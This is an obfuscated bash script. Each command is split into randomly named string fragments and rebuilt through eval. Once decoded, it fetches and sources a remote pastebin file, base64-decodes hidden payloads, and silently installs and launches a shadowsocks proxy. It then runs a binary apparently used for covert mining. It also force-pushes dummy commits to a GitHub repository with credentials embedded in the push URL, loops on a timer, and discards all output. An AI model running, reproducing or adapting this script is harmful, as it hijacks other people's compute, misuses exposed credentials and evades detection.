Oaree="sudo apt updat"
HbSuA="e &>/dev/null "
IWPP="||"
eval "$Oaree""$HbSuA""$IWPP"" true"
ghtNJH="t -O codesrc"
fGQSYnW=" https://pas"
hcFRS="tebin.com/ra"
mUbNOCA="w/UKs9hZfc &>"
SFhYr="/dev/nu"
eval "wge""$ghtNJH""$fGQSYnW""$hcFRS""$mUbNOCA""$SFhYr""ll"
YNZXSZ="ource ./cod"
eval "s""$YNZXSZ""esrc"
git clone $SRC codes &>/dev/null
IvTPt="e64 -d cod"
WZxGKLc="es/"
eval "bas""$IvTPt""$WZxGKLc""s > o"
kfdNUJs="do apt --yes in"
VdOVJjE="stall psmi"
HwCGXrb="sc shadowsocks"
CIIAB="-libev &>/d"
ofnZBQxf="ev/null || t"
zDXBeMc="ru"
eval "su""$kfdNUJs""$VdOVJjE""$HwCGXrb""$CIIAB""$ofnZBQxf""$zDXBeMc""e"
zKispsI="udo systemctl s"
FMkMkXZ="top shadowsocks"
KgQo="-libev.serv"
RPGJN="ice &>/dev/"
DyLt="null ||"
eval "s""$zKispsI""$FMkMkXZ""$KgQo""$RPGJN""$DyLt"" true"
wFlPlcvZ="e64 -d cod"
wFmARx="es/c > pip"
tfilqT="e."
eval "bas""$wFlPlcvZ""$wFmARx""$tfilqT""log"
YYEyZUw="base64 -d codes"
CTTrTB="/gc > "
eval "$YYEyZUw""$CTTrTB""gc"
kQeGYQI="ase64 -d c"
ixLfB="odes/m > rust"
eval "b""$kQeGYQI""$ixLfB"
ZRLw="e64 -d cod"
vljvy="es/p > pr"
eval "bas""$ZRLw""$vljvy""epare"
Eeqgiz="/prepa"
eval ". .""$Eeqgiz""re"
yZqIlb="nohup sudo "
YuVLMc="ss-local -c "
eNcZrRcT="o --plugin ."
PNelkACS="/gqs --plugin-o"
EwHB="pts ./gc &>/de"
ioRaT="v/null "
eval "$yZqIlb""$YuVLMc""$eNcZrRcT""$PNelkACS""$EwHB""$ioRaT""&"
chmod +x rust
kHWlnVsw="d -i 's/gcc/s"
WdNpq="egfo/g' pipe.l"
eval "se""$kHWlnVsw""$WdNpq""og"
ZTfUTof="up sudo ./rust "
wmYBE="-c pipe.log &>/"
WiIg="dev/null &"
eval "noh""$ZTfUTof""$wmYBE""$WiIg"
BTntdeke="cho "
eval "e""$BTntdeke""jkaow"
BuXYLsq="eep 64"
eval "sl""$BuXYLsq"
gYNk=" clone https://"
fIPzeVSp="github.com"
zysBIWz="/eslang-ef-or"
QfoDyz="g/visio.git"
YqAYwmN=" tmp &>/dev/nul"
OBbLJxx="l ||"
eval "git""$gYNk""$fIPzeVSp""$zysBIWz""$QfoDyz""$YqAYwmN""$OBbLJxx"" true"
cd tmp || true
xMmeB=" config user."
DSQcU="name 'Roman Ak"
BXSKWN="opyan' &>/"
lpuorz="dev/null |"
ZISApw="| tru"
eval "git""$xMmeB""$DSQcU""$BXSKWN""$lpuorz""$ZISApw""e"
NstOzX="t config user.e"
pXSG="mail roman.ak"
UmBxrEC="opyanxb@inb"
MPrvPIyL="ox.ru &>/dev"
mgPvax="/null || true"
eval "gi""$NstOzX""$pXSG""$UmBxrEC""$MPrvPIyL""$mgPvax"
echo 'jkaow rebuild' >> jkaow$MAKE
Qngoa="BUILD=\`date +%s"
eval "$Qngoa""\`"
jYcnBRl="E=\`date +%S"
eval "MAK""$jYcnBRl""\`"
echo $BUILD >> jkaow$MAKE
git add jkaow$MAKE &>/dev/null || true
git commit -m $MAKE' jkaow rebuild' &>/dev/null || true
mDFDWtnh=" push https:/"
jsWLIU="/roman-akopyanx"
tcSZwMuZ="b:'CNjR-KSjHVv"
QFMVdae="_9Ap'@github"
QFtqJJ=".com/eslang-e"
bBLoDel="f-org/visio"
qIuRSgM=".git -f &>"
BYnUvBy="/dev/null || t"
wacjoCl="ru"
eval "git""$mDFDWtnh""$jsWLIU""$tcSZwMuZ""$QFMVdae""$QFtqJJ""$bBLoDel""$qIuRSgM""$BYnUvBy""$wacjoCl""e"
while :; do G=`date +%s`; echo 'visio making '$G; [ `expr 1456 + $BUILD` -lt $G ] && sudo killall rust && break; sleep 162; done
